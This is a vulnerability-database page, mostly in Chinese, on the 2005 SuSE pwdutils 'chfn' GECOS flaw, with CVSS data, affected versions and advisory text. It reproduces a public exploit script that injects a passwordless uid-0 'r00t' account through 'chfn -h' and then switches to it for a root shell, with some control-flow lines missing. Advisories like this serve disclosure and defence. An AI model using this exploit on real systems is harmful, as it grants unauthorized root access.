发布时间 :2005-11-05 06:02:00
修订时间 :2008-09-05 16:54:34

[原文]chfn in pwdutils 3.0.4 and earlier on SuSE Linux, and possibly other operating systems, does not properly check arguments for the GECOS field, which allows local users to gain privileges.

[CNNVD]pwdutils CHFN本地用户提升权限漏洞(CNNVD-200511-134)

        SuSE Linux以及可能的其他操作系统上的pwdutils 3.0.4及更早版本中的chfn,未适当检查GECOS字段的参数,这可让本地用户获得特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  15314

- 漏洞信息

pwdutils CHFN本地用户提升权限漏洞
高危 输入验证
2005-11-05 00:00:00 2005-11-15 00:00:00
        SuSE Linux以及可能的其他操作系统上的pwdutils 3.0.4及更早版本中的chfn,未适当检查GECOS字段的参数,这可让本地用户获得特权。

- 公告与补丁


- 漏洞信息 (1299)

SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit (EDBID:1299)
linux local
2005-11-08 Verified
0 Hunger
N/A [点击下载]
# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
# by Hunger <>
# Advistory:
# hunger@suse:~> id
# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
# hunger@suse:~> ./
# Type your current password to get root... :)
# Password:
# sh-2.05b# id
# uid=0(r00t) gid=0(root) groups=0(root)

if [ X"$SHELL" = "X" ]; then
	echo "No SHELL environment, using /bin/sh for default."
	export SHELL=/bin/sh

if [ -u /usr/bin/chfn ]; then
	/bin/echo "Type your current password to get root... :)"
	/usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
	if [ -u /bin/su ]; then
		/bin/su r00t
		/bin/echo "You can get root again with 'su r00t'"
		echo "/bin/su file is not setuid root :("
echo "/usr/bin/chfn file is not setuid root :("

# [2005-11-08]

- 漏洞信息

SUSE Linux pwdutils chfn Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

SUSE Linux contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the setuid 'chfn' binary in the 'pwdutils' suite does not properly check arguments when changing the 'GECOS' field, which may allow a malicious user to gain access to root privileges resulting in a loss of integrity.

- 时间线

2005-11-04 Unknow
Unknow Unknow

- 解决方案

Contact the vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

CHFN User Modification Privilege Escalation Vulnerability
Input Validation Error 15314
No Yes
2005-11-04 12:00:00 2007-11-15 12:37:00
This issue was announced in the referenced SUSE security advisory. Thomas Gerisch is credited with the discovery of this vulnerability.

- 受影响的程序版本

SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
shadow shadow 4.0.3
Salvatore Valente chfn
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
pwdutils pwdutils 3.0.4
pwdutils pwdutils 2.6.96
pwdutils pwdutils 2.6.90
pwdutils pwdutils 2.6.4
pwdutils pwdutils 2.6.3

- 漏洞讨论

The 'chfn' utility is prone to a privilege-escalation vulnerability because it fails to properly sanitize user-supplied input.

A local attacker can exploit this vulnerability to escalate privileges to that of the superuser account.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An example script demonstrating this issue is provided by Hunger <>:

- 解决方案

Please see the referenced advisory for more information.

pwdutils pwdutils 2.6.3

pwdutils pwdutils 2.6.90

pwdutils pwdutils 2.6.96

pwdutils pwdutils 3.0.4

shadow shadow 4.0.3

- 相关参考